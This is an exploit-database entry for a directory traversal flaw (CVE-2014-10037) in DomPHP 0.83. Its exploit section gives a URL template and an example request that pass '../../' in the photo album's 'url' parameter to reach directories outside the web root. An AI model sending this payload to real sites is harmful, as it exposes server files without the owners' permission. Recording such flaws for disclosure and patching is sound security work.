DomPHP 0.83 - Local Directory Traversal

Author: Houssamix
type: webapps
platform: php
port: 
date_added: 2014-01-17  
date_updated: 2014-01-17  
verified: 0  
codes: OSVDB-102204;CVE-2014-10037  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 30865.txt  
-------------------------------------------------------------
DomPHP <= v0.83 Local Directory Traversal Vulnerability
-------------------------------------------------------------

= Author : Houssamix
= Script : DomPHP <= v0.83

= Download : http://www.domphp.com/download/

= BUG :  Local Directory Traversal Vulnerability

= Exploit :
http://[target]/photoalbum/index.php?urlancien=&url=[Directory]

Exemple :
http://target.com/photoalbum/index.php?urlancien=&url=../../